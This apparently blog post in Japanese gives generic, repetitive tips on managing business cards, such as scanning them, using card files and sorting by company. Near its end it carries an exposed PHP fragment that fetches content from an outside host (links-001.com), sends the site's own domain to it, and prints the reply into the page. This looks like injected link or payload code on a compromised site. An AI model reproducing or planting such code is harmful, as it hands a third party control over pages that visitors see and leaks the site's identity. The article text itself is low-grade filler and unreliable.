名刺の管理の一般的なやり方には

名刺の交換などでもらった名刺の管理のやり方は基本的に電子データ化することで、簡単に検索したりとやり方によっては外出先でそのデータを閲覧するのも可能になってくるところです。
そのままカードケースなどに入れておくと紛失しにくくなってくれますが、手間もかけずに管理する方法もありです。
名刺専用のファイルを利用したりと工夫をするのもできることですが、難しくもなく整理整頓しやすくなってくれたりととても便利です。
インターネットを利用して管理する方法になってくるとそれに応じたソフトを使ったりと画像として取り入れてみるとわかりやすいですが、社名など企業ごとで区別してみるのも明確化しやすくなってくれるポイントです。
名刺をもらってからそれ以降連絡をする機会がなかったりするケースでは、一定の期間を過ぎてからよく利用する連絡先とも分類をしてみるのが好ましいですが、複数枚持っている際も管理がしやすくなってくるからです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新投稿